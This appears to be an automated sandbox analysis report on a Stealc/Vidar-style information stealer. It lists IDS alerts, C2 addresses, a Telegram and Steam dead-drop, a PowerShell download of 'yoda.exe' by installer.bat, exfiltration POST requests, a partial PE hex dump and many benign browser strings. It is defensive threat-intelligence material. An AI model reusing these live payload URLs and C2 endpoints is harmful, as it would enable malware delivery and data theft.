Source: Network traffic	Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 5.252.155.64:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49771 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49766 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.5:49783
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.5:49777

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199809363512

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 06:09:17 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Fri, 20 Dec 2024 08:06:15 GMTETag: "d0618-629af1ef17b5e"Accept-Ranges: bytesContent-Length: 853528Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 ac 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 50 10 00 00 04 00 00 4c 30 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 86 3b 00 00 00 00 00 00 00 00 00 00 d0 eb 0c 00 48 1a 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 86 3b 00 00 00 00 10 00 00 3c 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 40 10 00 00 10 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 18.165.220.106 18.165.220.106
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: WORLDSTREAMNL WORLDSTREAMNL

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 5.252.155.64:80 -> 192.168.2.5:49704

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0098D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

21_2_0098D889

Source: global traffic	HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1735279845647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2553C31DEE6B611F1DE5D67FEF6C6080&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1735279845647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2553C31DEE6B611F1DE5D67FEF6C6080&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=15166cfb5c5b57cbb43e95c1735279847; XID=15166cfb5c5b57cbb43e95c1735279847
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1735279845647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=eaad338094814ebcb2326dd2842d0ca1&activityId=eaad338094814ebcb2326dd2842d0ca1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0118A228C46841D29A7548549B7CD78F&MUID=2553C31DEE6B611F1DE5D67FEF6C6080 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /yoda.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5.252.155.64Connection: Keep-Alive

Source: f34587d1-f8b2-4bc7-8086-fec04d04a4ff.tmp.37.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log5.37.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log5.37.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log5.37.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000003.2643418202.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643487327.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643237196.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000018.00000003.2643418202.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643487327.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2643237196.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2729996442.000054DC00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2724139396.000054DC00730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglT equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729941108.000054DC00DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlbag equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2728069443.000054DC00C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000018.00000002.2729235814.000054DC00D18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: bijutr.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DJ5FK6FU3EKNYMOPHD2DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: installer.bat	String found in binary or memory: http://5.252.155.64/yoda.exe
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
